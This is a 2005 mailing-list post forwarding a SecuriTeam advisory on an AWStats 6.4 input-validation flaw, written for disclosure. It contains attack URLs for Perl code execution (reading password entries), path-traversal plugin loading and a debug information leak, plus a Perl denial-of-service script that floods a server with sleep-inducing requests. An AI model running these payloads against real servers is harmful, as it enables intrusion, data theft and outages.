[eside-ghost] Fw: [UNIX] AWStats PluginMode and LoadPlugin Command
Execution
txipi
txipi en sindominio.net
Jue Feb 17 22:19:47 CET 2005
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Aupa!
Borja, supongo que te interesarán los detalles...
Begin forwarded message:
Date: 17 Feb 2005 18:12:03 +0200
From: SecuriTeam <support en securiteam.com>
To: list en securiteam.com
Subject: [UNIX] AWStats PluginMode and LoadPlugin Command Execution
The following security advisory is sent to the securiteam mailing list,
and can be found at the SecuriTeam web site: http://www.securiteam.com
- - - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - - -
AWStats PluginMode and LoadPlugin Command Execution
- ------------------------------------------------------------------------
SUMMARY
<http://awstats.sourceforge.net/> AWStats is "a free tool that
generates
advanced web, ftp or mail server statistics, graphically". Remote
exploitation of an input validation vulnerability in AWStats allows
attackers to execute arbitrary Perl commands under the privileges of the
web server via the PluginMode and LoadPlugin parameter. The following
exploit code can be used to test your system for the mentioned
vulnerability (the exploit code contains samples and one PoC denial of
service exploit).
DETAILS
Vulnerable Systems:
* AWStats version 6.4 and prior
Exploit:
#!/usr/bin/perl
#
#
# Summarized the advisory www.ghc.ru GHC: /str0ke
#
# [0] Exploitable example (raw log plugin):
# Attacker can read sensitive information
#
#
http://server/cgi-bin/awstats-6.4/awstats.pl?pluginmode=rawlog&loadplugin=rawlog
#
# [1] Perl code execution. (This script)
#
# http://server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent
#
# [2] Arbitrary plugin including.
#
#
http://server/cgi-bin/awstats-6.4/awstats.pl?&loadplugin=../../../../usr/libdata/perl/5.00503/blib
#
# [3] Sensetive information leak in AWStats version 6.3(Stable) -
6.4(Development).
# Every user can access debug function:
#
# http://server/cgi-bin/awstats-6.4/awstats.pl?debug=1
# http://server/cgi-bin/awstats-6.4/awstats.pl?debug=2
#
# Be sure to change the $server + /cgi-bin location /str0ke
#
use IO::Socket;
$server = 'www.example.com';
sub ConnectServer {
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server",
PeerPort => "80")
|| die "Error\n";
print $socket "GET
/cgi-bin/awstats-6.4/awstats.pl?&hack=$rp&PluginMode=:sleep HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "\n\n";
}
while () {
$rp = rand;
&ConnectServer;
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:foster en ghc.ru> GHC.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and
body to: list-unsubscribe en securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe en securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of
any kind.
In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or
special damages.
- --
Agur
txipi
wget -O - http://sindominio.net/~txipi/txipi.gpg.asc | gpg --import
Key fingerprint = CCAF 9676 B049 997A 96D6 4D7C 3529 5545 4375 1BF4
Bill Dickey is learning me his experience.
-- Yogi Berra in his rookie season.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)
iD8DBQFCFQpzNSlVRUN1G/QRAvPCAKCv4sdZyHP0Y1Iw5r2suUi6oXyLlQCfT+fz
iRNC3Okk6024ilKoFyKj/ro=
=qzuO
-----END PGP SIGNATURE-----
Más información sobre la lista de distribución eside-ghost